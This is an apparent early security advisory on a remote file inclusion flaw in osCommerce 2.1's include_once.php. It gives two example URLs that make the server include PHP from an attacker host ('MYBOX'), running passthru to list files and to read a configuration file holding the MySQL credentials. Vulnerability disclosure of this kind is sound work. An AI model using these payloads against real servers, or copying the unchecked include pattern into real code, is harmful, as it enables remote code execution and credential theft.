PHP source injection in osCommerce ---------------------------------- Product Description osCommerce is an open source e-commerce solution under on going development by the open source community. Its feature packed out-of-the- box installation allows store owners to setup, run, and maintain their online stores with minimum effort and with no costs involved. It can be found at http://www.oscommerce.com Tested version Preview Release 2.1 (06/03/2001) (this is a preview version, but there are alot of online shops who use this) The Problem osCommerce commes with a file called /catalog/includes/include_once.php, and looks like this: -------- include_once.php -------- <? if (!defined($include_file . '__')) { define($include_file . '__', 1); include($include_file); } ?> ---------------------------------- If someone request a URL like http://SERVER/catalog/inludes/include_once.php? include_file=FILE_WE_WANT_TO_INCLUDE, he would be able to include any code he wants This could be a serious problem because this user could query the SQL server and get acccess to other important files... Examples -------- Example 1 -------- http://SERVER/catalog/inludes/include_once.php? include_file=http://MYBOX/a.php --- a.php --- <? passthru("/bin/ls")?> ------------- Output: dir listing of the current dierctory --------------------------- -------- Example 2 -------- http://SERVER/catalog/inludes/include_once.php? include_file=http://MYBOX/b.php --- b.php --- <? passthru("/bin/cat application_top.php")?> ------------- Output: outputs the application_top.php file wich includes MySQL username, password, ... --------------------------- I informed the vendor and hope that they will release a patch soon ------------------------------ Tim Vandermeersch Tim.Vandermeersch@pandora.be
